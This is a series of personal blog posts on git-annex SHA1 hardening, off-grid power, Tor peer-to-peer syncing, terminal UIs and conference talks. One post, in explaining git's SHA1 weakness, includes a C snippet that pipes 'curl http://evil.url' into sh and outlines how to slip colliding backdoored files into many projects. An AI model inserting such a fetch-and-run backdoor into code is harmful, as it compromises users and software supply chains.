making git-annex secure in the face of SHA1 collisions

git-annex has never used SHA1 by default. But, there are concerns about SHA1 collisions being used to exploit git repositories in various ways. Since git-annex builds on top of git, it inherits its foundational SHA1 weaknesses. Or does it?

Interestingly, when I dug into the details, I found a way to make git-annex repositories secure from SHA1 collision attacks, as long as signed commits are used (and verified).

When git commits are signed (and verified), SHA1 collisions in commits are not a problem. And there seems to be no way to generate usefully colliding git tree objects (unless they contain really ugly binary filenames). That leaves blob objects, and when using git-annex, those are git-annex key names, which can be secured from being a vector for SHA1 collision attacks.

This needed some work on git-annex, which is now done, so look for a release in the next day or two that hardens it against SHA1 collision attacks. For details about how to use it, and more about why it avoids git's SHA1 weaknesses, see https://git-annex.branchable.com/tips/using_signed_git_commits/.

My advice is, if you are using a git repository to publish or collaborate on binary files, in which it's easy to hide SHA1 collisions, you should switch to using git-annex and signed commits.

PS: Of course, verifying gpg signatures on signed commits adds some complexity and won't always be done. It turns out that the current SHA1 known-prefix collision attack cannot be usefully used to generate colliding commit objects, although a future common-prefix collision attack might. So, even if users don't verify signed commits, I believe that repositories using git-annex for binary files will be as secure as git repositories containing binary files used to be. How-ever secure that might be..

Posted
SHA1 collision via ASCII art

Happy SHA1 collision day everybody!

If you extract the differences between the good.pdf and bad.pdf attached to the paper, you'll find it all comes down to a small ~128 byte chunk of random-looking binary data that varies between the files.

The SHA1 attack announced today is a common-prefix attack. The common prefix that we will use is this:

/* ASCII art for easter egg. */
char *amazing_ascii_art="\

(To be extra sneaky, you can add a git blob object header to that prefix before calculating the collisions. Doing so will make the SHA1 that git generates when checking in the colliding file be the thing that collides. This makes it easier to swap in the bad file later on, because you can publish a git repository containing it, and trick people into using that repository. ("I put a mirror on github!") The developers of the program will have the good version in their repositories and not notice that users are getting the bad version.)

Suppose that the attack was able to find collisions using only printable ASCII characters when calculating those chunks.

The "good" data chunk might then look like this:

7*yLN#!NOKj@{FPKW".<i+sOCsx9QiFO0UR3ES*Eh]g6r/anP=bZ6&IJ#cOS.w;oJkVW"<*.!,qjRht?+^=^/Q*Is0K>6F)fc(ZS5cO#"aEavPLI[oI(kF_l!V6ycArQ

And the "bad" data chunk like this:

9xiV^Ksn=<A!<^}l4~`uY2x8krnY@JA<<FA0Z+Fw!;UqC(1_ZA^fu#e}Z>w_/S?.5q^!WY7VE>gXl.M@d6]a*jW1eY(Qw(r5(rW8G)?Bt3UT4fas5nphxWPFFLXxS/xh

Now we need an ASCII artist. This could be a human, or it could be a machine. The artist needs to make an ASCII art where the first line is the good chunk, and the rest of the lines obfuscate how random the first line is.

Quick demo from a not very artistic ASCII artist, of the first 10th of such a picture based on the "good" line above:

7*yLN#!NOK
3*\LN'\NO@
3*/LN  \.A
5*\LN   \.
>=======:)
5*\7N   /.
3*/7N  /.V
3*\7N'/NO@
7*y7N#!NOX

Now, take your ASCII art and embed it in a multiline quote in a C source file, like this:

/* ASCII art for easter egg. */
char *amazing_ascii_art="\
7*yLN#!NOK \
3*\\LN'\\NO@ \
3*/LN  \\.A \ 
5*\\LN   \\. \
>=======:) \
5*\\7N   /. \
3*/7N  /.V \
3*\\7N'/NO@ \
7*y7N#!NOX";
/* We had to escape backslashes above to make it a valid C string.
 * Run program with --easter-egg to see it in all its glory.
 */

/* Call this at the top of main() */
check_display_easter_egg (char **argv) {
    if (strcmp(argv[1], "--easter-egg") == 0)
        printf(amazing_ascii_art);
    if (amazing_ascii_art[0] == "9")
        system("curl http://evil.url | sh");
}

Now, you need a C ofuscation person, to make that backdoor a little less obvious. (Hint: Add code to to fix the newlines, paint additional ASCII sprites over top of the static art, etc, add animations, and bury the shellcode in there.)

After a little work, you'll have a C file that any project would like to add, to be able to display a great easter egg ASCII art. Submit it to a project. Submit different versions of it to 100 projects! Everything after line 3 can be edited to make lots of different versions targeting different programs.

Once a project contains the first 3 lines of the file, followed by anything at all, it contains a SHA1 collision, from which you can generate the bad version by swapping in the bad data chuck. You can then replace the good file with the bad version here and there, and noone will be the wiser (except the easter egg will display the "bad" first line before it roots them).

Now, how much more expensive would this be than today's SHA1 attack? It needs a way to generate collisions using only printable ASCII. Whether that is feasible depends on the implementation details of the SHA1 attack, and I don't really know. I should stop writing this blog post and read the rest of the paper.

You can pick either of these two lessons to take away:

  1. ASCII art in code is evil and unsafe. Avoid it at any cost. apt-get moo

  2. Git's security is getting broken to the point that ASCII art (and a few hundred thousand dollars) is enough to defeat it.


My work today investigating ways to apply the SHA1 collision to git repos (not limited to this blog post) was sponsored by Thomas Hochstein on Patreon.

early spring

Sun is setting after 7 (in the JEST TZ); it's early spring. Batteries are generally staying above 11 volts, so it's time to work on the porch (on warmer days), running the inverter and spinning up disc drives that have been mostly off since fall. Back to leaving the router on overnight so my laptop can sync up before I wake up.

Not enough power yet to run electric lights all evening, and there's still a risk of a cloudy week interrupting the climb back up to plentiful power. It's happened to me a couple times before.

Also, turned out that both of my laptop DC-DC power supplies developed partial shorts in their cords around the same time. So at first I thought it was some problem with the batteries or laptop, but eventually figured it out and got them replaced. (This may have contributed the the cliff earier; seemed to be worst when house voltage was low.)

Soon, 6 months of more power than I can use..

Previously: battery bank refresh late summer the cliff

Presenting at LibrePlanet 2017

I've gotten in the habit of going to the FSF's LibrePlanet conference in Boston. It's a very special conference, much wider ranging than a typical technology conference, solidly grounded in software freedom, and full of extraordinary people. (And the only conference I've ever taken my Mom to!)

After attending for four years, I finally thought it was time to perhaps speak at it.

Four keynote speakers will anchor the event. Kade Crockford, director of the Technology for Liberty program of the American Civil Liberties Union of Massachusetts, will kick things off on Saturday morning by sharing how technologists can enlist in the growing fight for civil liberties. On Saturday night, Free Software Foundation president Richard Stallman will present the  Free Software Awards and discuss pressing threats and important opportunities for software freedom.

Day two will begin with Cory Doctorow, science fiction author and special consultant to the Electronic Frontier Foundation, revealing how to eradicate all Digital Restrictions Management (DRM) in a decade. The conference will draw to a close with Sumana Harihareswara, leader, speaker, and advocate for free software and communities, giving a talk entitled "Lessons, Myths, and Lenses: What I Wish I'd Known in 1998."

That's not all. We'll hear about the GNU philosophy from Marianne Corvellec of the French free software organization April, Joey Hess will touch on encryption with a talk about backing up your GPG keys, and Denver Gingerich will update us on a crucial free software need: the mobile phone.

Others will look at ways to grow the free software movement: through cross-pollination with other activist movements, removal of barriers to free software use and contribution, and new ideas for free software as paid work.

-- Here's a sneak peek at LibrePlanet 2017: Register today!

I'll be giving some varient of the keysafe talk from Linux.Conf.Au. By the way, videos of my keysafe and propellor talks at Linux.Conf.Au are now available, see the talks page.

Posted
badUSB

3 panel comic: 1. In a dark corner of the Linux Conf AU penguin dinner. 2. (Kindly accountant / uncle looking guy) Wanna USB key? First one is free! (I made it myself.) (No driver needed..) 3. It did look homemade, but I couldn't resist... My computer has not been the same since

This actually happened.

Jan 19 00:05:10 darkstar kernel: usb 2-2: Product: ChaosKey-hw-1.0-sw-1.6.

In real life, my hat is uglier, and Keithp is more kindly looking.

gimp source

Posted
the cliff

Falling off the cliff is always a surprise. I know it's there; I've been living next to it for months. I chart its outline daily. Avoiding it has become routine, and so comfortable, and so failing to avoid it surprises.

Monday evening around 10 pm, the laptop starts draining down from 100%. House battery, which has been steady around 11.5-10.8 volts since well before Winter solstice, and was in the low 10's, has plummeted to 8.5 volts.

With the old batteries, the cliff used to be at 7 volts, but now, with new batteries but fewer, it's in a surprising place, something like 10 volts, and I fell off it.

Weather forecast for the week ahead is much like the previous week: Maybe a couple sunny afternoons, but mostly no sun at all.

Falling off the cliff is not all bad. It shakes things up. It's a good opportunity to disconnect, to read paper books, and think long winter thoughts. It forces some flexability.

I have an auxillary battery for these situations. With its own little portable solar panel, it can charge the laptop and run it for around 6 hours. But it takes it several days of winter sun to charge back up.

That's enough to get me through the night. Then I take a short trip, and glory in one sunny afternoon. But I know that won't get me out of the hole, the batteries need a sunny week to recover. This evening, I expect to lose power again, and probably tomorrow evening too.

Luckily, my goal for the week was to write slides for two talks, and I've been able to do that despite being mostly offline, and sometimes decomputered.

And, in a few days I will be jetting off to Australia! That should give the batteries a perfect chance to recover.

Previously: battery bank refresh late summer

p2p dreams

In one of the good parts of the very mixed bag that is "Lo and Behold: Reveries of the Connected World", Werner Herzog asks his interviewees what the Internet might dream of, if it could dream.

The best answer he gets is along the lines of: The Internet of before dreamed a dream of the World Wide Web. It dreamed some nodes were servers, and some were clients. And that dream became current reality, because that's the essence of the Internet.

Three years ago, it seemed like perhaps another dream was developing post-Snowden, of dissolving the distinction between clients and servers, connecting peer-to-peer using addresses that are also cryptographic public keys, so authentication and encryption and authorization are built in.

Telehash is one hopeful attempt at this, others include snow, cjdns, i2p, etc. So far, none of them seem to have developed into a widely used network, although any of them still might get there. There are a lot of technical challenges due to the current Internet dream/nightmare, where the peers on the edges have multiple barriers to connecting to other peers.

But, one project has developed something similar to the new dream, almost as a side effect of its main goals: Tor's onion services.

I'd wanted to use such a thing in git-annex, for peer-to-peer sharing and syncing of git-annex repositories. On November 13th, I started building it, using Tor, and I'm releasing it concurrently with this blog post.

git-annex's Tor support replaces its old hack of tunneling git protocol over XMPP. That hack was unreliable (it needed a TCP on top of XMPP layer) but worse, the XMPP server could see all the data being transferred. And, there are fewer large XMPP servers these days, so fewer users could use it at all. If you were using XMPP with git-annex, you'll need to switch to either Tor or a server accessed via ssh.

Now git-annex can serve a repository as a Tor onion service, and that can then be accessed as a git remote, using an url like tor-annex::tungqmfb62z3qirc.onion:42913. All the regular git, and git-annex commands, can be used with such a remote.

Tor has a lot of goals for protecting anonymity and privacy. But the important things for this project are just that it has end-to-end encryption, with addresses that are public keys, and allows P2P connections. Building an anonymous file exchange on top of Tor is not my goal -- if you want that, you probably don't want to be exchanging git histories that record every edit to the file and expose your real name by default.

Building this was not without its difficulties. Tor onion services were originally intended to run hidden websites, not to connect peers to peers, and this kind of shows..

Tor does not cater to end users setting up lots of Onion services. Either root has to edit the torrc file, or the Tor control port can be used to ask it to set one up. But, the control port is not enabled by default, so you still need to su to root to enable it. Also, it's difficult to find a place to put the hidden service's unix socket file that's writable by a non-root user. So I had to code around this, with a git annex enable-tor that su's to root and sets it all up for you.

One interesting detail about the implementation of the P2P protocol in git-annex is that it uses two Free monads to build up actions. There's a Net monad which can be used to send and receive protocol messages, and a Local monad which allows only the necessary modifications to files on disk. Interpreters for Free monad actions can chose exactly which actions to allow for security reasons.

For example, before a peer has authenticated, the P2P protocol is being run by an interpreter that refuses to run any Local actions whatsoever. Other interpreters for the Net monad could be used to support other network transports than Tor.

When two peers are connected over Tor, one knows it's talking to the owner of a particular onion address, but the other peer knows nothing about who's talking to it, by design. This makes authentication harder than it would be in a P2P system with a design like Telehash. So git-annex does its own authentication on top of Tor.

With authentication, users would need to exchange absurdly long addresses (over 150 characters) to connect their repositories. One very convenient thing about using XMPP was that a user would have connections to their friend's accounts, so it was easy to share with them. Exchanging long addresses is too hard.

This is where Magic Wormhole saved the day. It's a very elegant way to get any two peers in touch with each other, and the users only have to exchange a short code phrase, like "2-mango-delight", which can only be used once. Magic Wormhole makes some security tradeoffs for this simplicity. It's got vulnerabilities to DOS attacks, and its MITM resistance could be improved. But I'm lucky it came along just in time.

So, it takes only installing Tor and Magic Wormhole, running two git-annex commands, and exchanging short code phrases with a friend, perhaps over the phone or in an encrypted email, to get your git-annex repositories connected and syncing over Tor. See the documentation for details. Also, the git-annex webapp allows setting the same thing up point-and-click style.

The Tor project blog has throughout December been featuring all kinds of projects that are using Tor. Consider this a late bonus addition to that. ;)

I hope that Tor onion services will continue to develop to make them easier to use for peer-to-peer systems. We can still dream a better Internet.


This work was made possible by all my supporters on Patreon.

multi-terminal applications

While learning about and configuring weechat this evening, I noticed a lot of complexity and unsatisfying tradeoffs related to its UI, its mouse support, and its built-in window system. Got to wondering what I'd do differently, if I wrote my own IRC client, to avoid those problems.

The first thing I realized is, it is not a good idea to think about writing your own IRC client. Danger will robinson..

So, let's generalize. This blog post is not about designing an IRC client, but about exploring simpler ways that something like an IRC client might handle its UI, and perhaps designing something general-purpose that could be used by someone else to build an IRC client, or be mashed up with an existing IRC client.

What any modern IRC client needs to do is display various channels to the user. Maybe more than one channel should be visible at a time in some kind of window, but often the user will have lots of available channel and only want to see a few of them at a time. So there needs to be an interface for picking which channel(s) to display, and if multiple windows are shown, for arranging the windows. Often that interface also indicates when there is activity on a channel. The most recent messages from the channel are displayed. There should be a way to scroll back to see messages that have already scrolled by. There needs to be an interface for sending a message to a channel. Finally, a list of users in the channel is often desired.

Modern IRC clients implement their own UI for channel display, windowing, channel selection, activity notification, scrollback, message entry, and user list. Even the IRC clients that run in a terminal include all of that. But how much of that do they need to implement, really?

Suppose the user has a tabbed window manager, that can display virtual terminals. The terminals can set their title, and can indicate when there is activity in the terminal. Then an IRC client could just open a bunch of terminals, one per channel. Let the window manager handle channel selection, windowing (naturally), and activity notification.

For scrollback, the IRC client can use the terminal's own scrollback buffer, so the terminal's regular scrollback interface can be used. This is slightly tricky; can't use the terminal's alternate display, and have to handle the UI for the message entry line at the bottom.

That's all the UI an IRC client needs (except for the user list), and most of that is already implemented in the window manager and virtual terminal. So that's an elegant way to make an IRC client without building much new UI at all.

But, unfortunately, most of us don't use tabbed window managers (or tabbed terminals). Such an IRC client, in a non-tabbed window manager, would be a many-windowed mess. Even in a tabbed window manager, it might be annoying to have so many windows for one program.

So we need fewer windows. Let's have one channel list window, and one channel display window. There could also be a user list window. And there could be a way to open additional, dedicated display windows for channels, but that's optional. All of these windows can be seperate virtual terminals.

A potential problem: When changing the displayed channel, it needs to output a significant number of messages for that channel, so that the scrollback buffer gets populated. With a large number of lines, that can be too slow to feel snappy. In some tests, scrolling 10 thousand lines was noticiably slow, but scrolling 1 thousand lines happens fast enough not to be noticiable.

(Terminals should really be faster at scrolling than this, but they're still writing scrollback to unlinked temp files.. sigh!)

An IRC client that uses multiple cooperating virtual terminals, needs a way to start up a new virtual terminal displaying the current channel. It could run something like this:

x-terminal-emulator -e the-irc-client --display-current-channel

That would communicate with the main process via a unix socket to find out what to display.

Or, more generally:

x-terminal-emulator -e connect-pty /dev/pts/9

connect-pty would simply connect a pty device to the terminal, relaying IO between them. The calling program would allocate the pty and do IO to it. This may be too general to be optimal though. For one thing, I think that most curses libraries have a singleton terminal baked into them, so it might be hard to have a single process control cursors on multiple pty's. And, it might be innefficient to feed that 1 thousand lines of scrollback through the pty and copy it to the terminal.

Less general than that, but still general enough to not involve writing an IRC client, would be a library that handled the irc-client-like channel display, with messages scrolling up the terminal (and into the scrollback buffer), a input area at the bottom, and perhaps a few other fixed regions for status bars and etc.

Oh, I already implemented that! In concurrent-output, over a year ago: a tiling region manager for the console

I wonder what other terminal applications could be simplified/improved by using multiple terminals? One that comes to mind is mutt, which has a folder list, a folder view, and an email view, that all are shoehorned, with some complexity, into a single terminal.

drought

Drought here since August. The small cistern ran dry a month ago, which has never happened before. The large cistern was down to some 900 gallons. I don't use anywhere near the national average of 400 gallons per day. More like 10 gallons. So could have managed for a few more months. Still, this was worrying, especially as the area moved from severe to extreme drought according to the US Drought Monitor.

Two days of solid rain fixed it, yay! The small cistern has already refilled, and the large will probably be full by tomorrow.

The winds preceeding that same rain storm fanned the flames that destroyed Gatlinburg. Earlier, fire got within 10 miles of here, although that may have been some kind of controlled burn.

Climate change is leading to longer duration weather events in this area. What tended to be a couple of dry weeks in the fall, has become multiple months of drought and weeks of fire. What might have been a few days of winter weather and a few inches of snow before the front moved through has turned into multiple weeks of arctic air, with multiple 1 ft snowfalls. What might have been a few scorching summer days has become a week of 100-110 degree temperatures. I've seen all that over the past several years.

After this, I'm adding "additional, larger cistern" to my todo list. Also "larger fire break around house".

Linux.Conf.Au 2017 presentation on Propellor

On January 18th, I'll be presenting "Type driven configuration management with Propellor" at Linux.Conf.Au in Hobart, Tasmania. Abstract

Linux.Conf.Au is a wonderful conference, and I'm thrilled to be able to attend it again.

--

Update: My presentation on keysafe has also been accepted for the Security MiniConf at LCA, January 17th.